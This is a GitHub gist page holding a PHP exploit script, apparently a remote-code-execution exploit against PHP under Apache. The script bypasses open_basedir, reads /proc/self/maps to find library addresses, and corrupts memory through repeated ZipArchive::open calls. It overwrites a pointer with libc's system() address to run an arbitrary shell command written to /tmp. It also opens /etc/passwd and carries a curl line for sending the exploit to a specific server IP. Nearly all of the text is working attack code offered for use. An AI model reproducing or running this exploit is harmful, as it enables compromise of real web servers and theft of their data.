-
-
Save neex/13378d0e7e9f9ab0cff9d9039178d15f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// <?php // <- to make GitHub syntax highlighter happy | |
// Run this with `curl 'http://52.53.55.151:11514/' -F "rce=<exploit.php"`. | |
$command = "your command here"; | |
$system_libc_offset = 0x000000000004f440; | |
$stdclass_instance_size = 40; | |
$string_header_size = 32; | |
$script_name = "/tmp/xx"; // must be exactly 7 characters | |
$good_archive_name = "/tmp/".str_repeat("A", $stdclass_instance_size - 6); | |
$bad_archive_name = "/etc/passwd"; | |
$scan_region_length = 500000; | |
function bypass_openbasedir() { | |
chdir("/tmp"); | |
mkdir("posos"); | |
chdir("posos"); | |
ini_set("open_basedir", ".."); | |
ini_get("open_basedir"); | |
chdir(".."); | |
chdir(".."); | |
ini_set("open_basedir", "/"); | |
if (ini_get("open_basedir") != "/") die("open_basedir bypass failed"); | |
} | |
function get_code_address_range($lib) { | |
$maps = file_get_contents("/proc/self/maps"); | |
preg_match_all("/^([0-9a-f]*)-([0-9a-f]*) r-xp .* ([^ ]*)$/m", $maps, $entries, PREG_SET_ORDER); | |
foreach ($entries as $entry) { | |
if ($entry[3] === $lib) { | |
$start = $entry[1]; | |
$end = $entry[2]; | |
return array(intval($start, 16), intval($end, 16)); | |
} | |
} | |
} | |
bypass_openbasedir(); | |
file_put_contents($script_name, "#!/bin/sh\n$command\n"); | |
chmod($script_name, 0777); | |
[$libphp_start, $libphp_end] = get_code_address_range("/usr/lib/apache2/modules/libphp8.so"); | |
[$libc_start, $libc_end] = get_code_address_range("/lib/x86_64-linux-gnu/libc-2.27.so"); | |
$system_addr = $libc_start + $system_libc_offset; | |
$archive = new ZipArchive(); | |
$archive->open($good_archive_name, ZipArchive::CREATE); | |
$archive->open($bad_archive_name, ZipArchive::CREATE); | |
$memory_view = str_repeat("A", $stdclass_instance_size - $string_header_size); | |
$archive->open($bad_archive_name, ZipArchive::CREATE); | |
$instance = new StdClass(); | |
if (strlen($memory_view) < $scan_region_length) die("Exploit failed"); | |
$f = fopen("php://filter/convert.base64-encode/resource=/etc/passwd", "r"); | |
for ($offset = 0; $offset < $scan_region_length; $offset++) { | |
$fields = unpack("Q*", substr($memory_view, $offset, 16)); | |
if ($fields[1] >= $libphp_start && $fields[1] <= $libphp_end && | |
$fields[2] >= $libphp_start && $fields[2] <= $libphp_end) { | |
$payload = "/tmp/xx\x00".pack("Q", $system_addr); | |
for ($i = 0; $i < 16; $i++) { | |
$memory_view[$offset + $i] = $payload[$i]; | |
} | |
} | |
} | |
fclose($f); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment